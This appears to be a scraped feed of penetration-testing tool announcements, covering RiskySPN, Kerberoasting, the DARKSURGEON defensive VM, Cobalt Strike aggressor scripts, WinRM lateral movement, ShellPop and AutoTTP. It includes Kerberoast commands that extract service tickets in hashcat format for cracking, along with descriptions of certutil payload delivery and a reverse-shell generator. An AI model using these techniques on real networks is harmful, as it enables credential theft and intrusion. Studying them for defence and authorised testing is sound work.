RiskySPN – Detect And Abuse Risky SPNs

RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory.For detailed information: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/UsageInstall the moduleImport-Module .\RiskySPNs.psm1Or just load the script (you can also IEX from web). .\Find-PotentiallyCrackableAccounts.ps1Make sure Set-ExecutionPolicy is Unrestricted or BypassGet information about a function (very detailed :))Get-Help Get-TGSCipher -FullAll fucntions also have -Verbose modeSearch vulnerable SPNsFind vulnerable accountsFind-PotentiallyCrackableAccountsSensitive + RC4 = $$$Generate full deatiled report about vulnerable accounts (CISO <3)Export-PotentiallyCrackableAccountsGet ticketsRequest Kerberos TGS for SPNGet-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"OrFind-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipherThe fun stuff :)Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txtoclHashcat64.exe -m 13100 crack.txt -a 3Download RiskySPN

Link: http://feedproxy.google.com/~r/PentestTools/~3/Zc66zkwABNE/riskyspn-detect-and-abuse-risky-spns.html

Kerberoast

The process of cracking Kerberos service tickets and rewriting them in order to gain access to the targeted service is called Kerberoast. This is very common attack in red team engagements since it doesn’t require any interaction with the service as legitimate active directory access can be used to request and export the service ticket […]

Link: https://pentestlab.blog/2018/06/12/kerberoast/

DARKSURGEON – A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.DARKSURGEON has three stated goals:Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.If you haven’t worked with packer before, this project has a simple premise:Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.Development PrinciplesDARKSURGEON is based on a few key development principles:Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way.Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post. Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.HardeningDARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.All default installations of DARKSURGEON have the following security features enabled:Windows Secure Boot is Enabled.Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)LLMNR is Disabled.NBT is Disabled.WPAD is Removed.Powershell v2 is Removed.SMB v1 is Removed.Application handlers for commonly-abused file extensions are changed to notepad.exe.Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls.In Low Security mode, the following hardening features are configured:Windows Defender Anti-Virus Real-Time Scanning is Disabled.Windows Defender SmartScreen is Disabled.Windows Defender Credential Guard is Disabled.Windows Defender Exploit Guard is Disabled.Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.Windows Defender Application Guard is Disabled.Windows Defender Application Guard does not enforce isolation.Note: High Security mode is still in development.High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration.In High Security mode, the following hardening features are configured:Windows Defender Anti-Virus Real-Time Scanning is Enabled.Windows Defender SmartScreen is Enabled and applied to All Traffic.Windows Defender Credential Guard is Enabled.Windows Defender Exploit Guard is Enabled.Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.Windows Defender Application Guard is Enabled.Windows Defender Application Guard enforces isolation.TelemetryWhether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:Windows Event Log Auditing is enabled. (Palantir Windows Event Forwarding Guidance).Windows Powershell Auditing is enabled. (Palantir Windows Event Forwarding Guidance).Sysinternals Sysmon is installed and configured. (SwiftonSecurity Ruleset)PrivacyYour operational environment contains some of the most sensitive data from your network, and it’s important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:Windows 10 telemetry settings are configured to minimize collection.Cortana, diagnostics, tracking, and other services are disabled.Windows Error Reporting (WER) is disabled.Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered. Microsoft Guidance for reducing telemetry and data collection has been implemented.PackagesOut of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.Android Analysis:Tools, scripts, and binaries focused on android analysis and reverse engineering.APKTool (FLARE)Blue Team:Tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development.ACEBloodhound / SharphoundCimSweepDumpsterfireEndGame Red Team Automation (RTA)KansaPosh-GitInvoke-ATTACKAPILOLBAS (Living Off the Land Binaries And Scripts)OSX CollectorPosh-SecModPosh-SysmonPowerForensicsPowerSploitPractical Malware Analysis Labs (FLARE)Revoke-ObfuscationYara (FLARE)Debuggers:Tools, scripts, and binaries for debugging binary artifacts.Ollydbg (FLARE)OllyDump (FLARE)OllyDumpEx (FLARE)Ollydbg2 (FLARE)OllyDump2Ex (FLARE)x64dbg (FLARE)Windbg (FLARE)Disassemblers:Tools, scripts, and binaries for disassembling binary artifacts.IDA Free Trial (FLARE)Binary Ninja Demo (FLARE)Radare2 (FLARE)Document Analysis: Tools, scripts, and binaries for performing analysis of documents.OffVis (FLARE)OfficeMalScanner (FLARE)PDFId (FLARE)PDFParser (FLARE)PDFStreamDumper (FLARE)DotNet Analysis:Tools, scripts, and binaries for performing analysis of DotNet artifacts.DE4Dot (FLARE)DNSpy (FLARE)DotPeek (FLARE)ILSpy (FLARE)Flash Analysis:Tools, scripts, and binaries for performing analysis of flash artifacts.FFDec (FLARE)Forensic Analysis:Tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts.Amcache ParserAppCompatCache ParserIISGeolocateJLECmdLECmdJumpList ExplorerPECmdRegistry ExplorerRegshot (FLARE)Shellbags ExplorerTimeline ExplorerTSK (The Sleuthkit)VolatilityX-Ways Forensics Installer Manager (XWFIM)Hex Editors:FileInsight (FLARE)HxD (FLARE)010 Editor (FLARE)Java Analysis:JD-GUI (FLARE)Dex2JARNetwork Analysis:Burp FreeFakeNet-NG (FLARE)Wireshark (FLARE)PE Analysis:DIE (FLARE)EXEInfoPE (FLARE)Malware Analysis Pack (MAP) (FLARE)PEiD (FLARE)ExplorerSuite (CFF Explorer) (FLARE)PEStudio (FLARE)PEview (FLARE)Resource Hacker (FLARE)VirusTotal UploaderPowershell Modules:Active DirectoryAzure ManagementPesterPython Libraries:CryptographyHexdumpOLEToolsLXMLPandasPassivetotalPEFilePyCryptodomeScapyShodanSigmaVisual C++ for PythonVivisectWinAppDBGYara-PythonRed Team:GrouperInveighNmapPowershell EmpirePowerupSQLPSAttackPSAttack Build ToolResponderRemote Management:AWS Command Line (AWSCLI)OpenSSHPuttyRemote Server Administration Tools (RSAT)Utilities:1Password7ZipAdobe Flash PlayerAdobe ReaderAPI MonitorBleachbitBoxstarterBstringsChecksumChocolateyCmderContainers (Hyper-V)CurlCyber ChefDockerDotNet 3.5DotNet 4ExiftoolFLOSS (FLARE)GitGoLangGoogle ChromeGPG4WinHashcalcHashdeepHasherHashtabHyper-VIrfanviewJava JDK8Java JRE8JQJupyterKeepassMicrosoft EdgeMozilla FirefoxMozilla ThunderbirdNeo4j CommunityNodeJSNugetOffice365 ProPlusOpenVPNOsqueryPython 2.7QbittorrentRawCapSlackSublime Text 3Sysinternals SuiteTor BrowserUnixUtilsUPXVisual C++ 2005Visual C++ 2008Visual C++ 2010Visual C++ 2012Visual C++ 2013Visual C++ 2015Visual C++ 2017Visual Studio CodeWindows 10 SDKWindows Subsystem for Linux (WSL)WinlogbeatXorSearchXorStringsVisual Basic Analysis:VBDecompilerBuilding DARKSURGEONBuild ProcessDARKSURGEON is built using the HashiCorp application packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm).Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.SetupNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Install packer, vagrant, and your preferred hypervisor on your host.Download the repository contents to your host.Download a Windows 10 Enterprise Evaluation ISO (1803).Move the ISO file to your local DARKSURGEON repository.Update DARKSURGEON.json with the ISO SHA1 hash and file name.(Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don’t trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.jsonConfiguring DARKSURGEONDARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they’ll be copied over to the host for you.Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.Using DARKSURGEONNote: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.Once DARKSURGEON has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.Install vagrant and your preferred hypervisor on your host.Navigate to the DARKSURGEON repository (or the location where you’ve saved the DARKSURGEON box file). Perform a vagrant up: vagrant upVagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one?Easy, just perform the following: vagrant destroy && vagrant upOnce the DARKSURGEON virtual machine is running, you can login using one of the two local accounts:Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.Administrator Account:Username: DarksurgeonPassword: darksurgeonLocal User Account:Username: UnprivilegedPassword: unprivilegedIf you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.Downloading DARKSURGEONIf you’d rather skip the process of building DARKSURGEON and want to trust the box file I’ve built, you can simply download it here.ContributingContributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.Frequently Asked QuestionsWhy is Hyper-V the preferred hypervisor?I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other Hypervisors are not recommended on the host machine. I will do my best to accomodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.Why does the entire packer build fail on a chocolatey package error?This was a design decision that was made to guarantee that all packages which were expected made it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted the build pipeline, as transient or chocolatey errors may cause a build to fail.If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.Does this project support using a Chocolatey Professional/Business/Consultant license?Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.Why are the build functions broken into dozens of individual powershell scriptsFlexibility is key. You may opt to use — or not use — any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.I want to debug the build. How do I do so?Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the packer build to halt for 4 hours as it waits for the script to complete.TroubleshootingThe packer build process never starts and hangs on the UEFI screen.This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any button a few times until the build process starts.Packer timed out during the build. I didn’t receive an error.Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.My VM is running, but packer doesn’t seem to connect via WinRM.Connect to the guest and check the following:WinRM is accessible from your packer host. (Test-NetConnection -ComputerName -Port 5985)WinRM is allowed on the guest firewall.I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying chocolatey packages.Download DARKSURGEON

Link: http://feedproxy.google.com/~r/PentestTools/~3/B8p_3LOKtq0/darksurgeon-windows-packer-project-to.html

AggressorScripts – Collection Of Aggressor Scripts For Cobalt Strike 3.0+ Pulled From Multiple Sources

Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources:All_In_One.cna v1 – Removed and outdated All purpose script to enhance the user’s experience with cobaltstrike. Custom menu creation, Logging, Persistence, Enumeration, and 3rd party script integration.Version 2 is currently in development!ArtifactPayloadGenerator.cna Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener Creates /opt/cobaltstrike/Staged_Payloads, /opt/cobaltstrike/Stageless_Payloads AVQuery.cna Queries the Registry with powershell for all AV Installed on the target Quick and easy way to get the AV you are dealing with as an attacker CertUtilWebDelivery.cna Stageless Web Delivery using CertUtil.exe Powerpick is used to spawn certutil.exe to download the stageless payload on target and execute with rundll32.exe RedTeamRepo.cna A common collection of OS commands, and Red Team Tips for when you have no Google or RTFM on hand. Script will be updated on occasion, feedback and more inputs are welcomed! ProcessColor.cna Color coded process listing without the file requirement. Thanks to @oldb00t for the original version: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight Download AggressorScripts

Link: http://feedproxy.google.com/~r/PentestTools/~3/eyZ3X6y8WgA/aggressorscripts-collection-of.html

Lateral Movement – WinRM

WinRM stands for Windows Remote Management and is a service that allows administrators to perform management tasks on systems remotely. Communication is performed via HTTP (5985) or HTTPS SOAP (5986) and support Kerberos and NTLM authentication by default and Basic authentication. Usage of this service requires administrator level credentials. In a red team scenario if […]

Link: https://pentestlab.blog/2018/05/15/lateral-movement-winrm/

ShellPop – Pop Shells Like A Master

Pop shells like a master Shell pop is all about popping shells. With this tool you can generate easy and sofisticated reverse or bind shell commands to help you during penetration tests. Don’t waste more time with .txt files storing your Reverse shells!InstallationPython 2.x is required.3.0+ version will not work.Required Dependencies Installroot@kali# apt-get install python-argcomplete -yroot@kali# pip install -r requirements.txtSetup Installroot@kali# python setup.py installPS: After installation, tab auto-complete will only work after restarting the terminal.Help SectionTo quickly list all available options of this tools, use –help.Command line examplesroot@kali# shellpop –helpShells ListList of shellsYou can list all available shellpop shells using the –list option.Command line exampleroot@kali# shellpop –listDownload ShellPop

Link: http://feedproxy.google.com/~r/PentestTools/~3/peg6gTlgbIg/shellpop-pop-shells-like-master.html

AutoTTP – Automated Tactics Techniques & Procedures

Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers & so on can be tedious. I toyed with the idea of making it easier to script Empire (or any frameworks/products/toolkits that provide APIs like Metasploit (RPC), Cobalt-Strike & so on) using IDE like Visual Studio Code (or equivalent). So I started to design AutoTTP. This is still very much work in progress. Please use Empire 2.2.What is TTP?The tactics are organized as per my Attack Life Cycle model. There are other models like Lockheed Martin’s Kill-Chain(R), Mandiant Attack Life Cycle & Mitre’s ATT&CK. Whichever model it may be, a “Tactic" essentially groups techniques together, eg. code-execution/run-payload can be achieved with many ways:Has been used "Stage" to group relevant "Tactics" together. If you look into the source tree, the folder structure reflects the matrix’s Tactics column. The matrix also mentioned respective controls for each offensive tactic. How did these stages came about?The venn diagram in the middle of the red cycle is from Dartmouth College’s "Three Tenets for Secure Cyber-Physical System Design and Assessment". It defines the necessary & sufficient conditions, or simply the requirements of any successful physical/logical attacks. I added the red ring (stages) around the venn diagram to illustrate typical offensive flows which ultimately leads to impact of Information Confidentiality, Integrity, & System Availability or Safety if it is related Cyber-Physical (think Critical Information Infrastructure).An attacker can start from Stage 1 and get straight into Stage 4 eg. default admin credentials on an publicly exposed admin page. It does not need to be linear (stage 1->2->3->4). After the initial infiltration, s/he could have performed some internal information gathering (reconn) first before escalating privilege on the first machine & then launching a remote command to another target machine within the same network. For the next victim machine, it is a Stage 2; successful payload delivery and execution which allows the attacker to gain command & control over yet another machine.Download AutoTTP

Link: http://feedproxy.google.com/~r/PentestTools/~3/FlsKk102ZOA/autottp-automated-tactics-techniques.html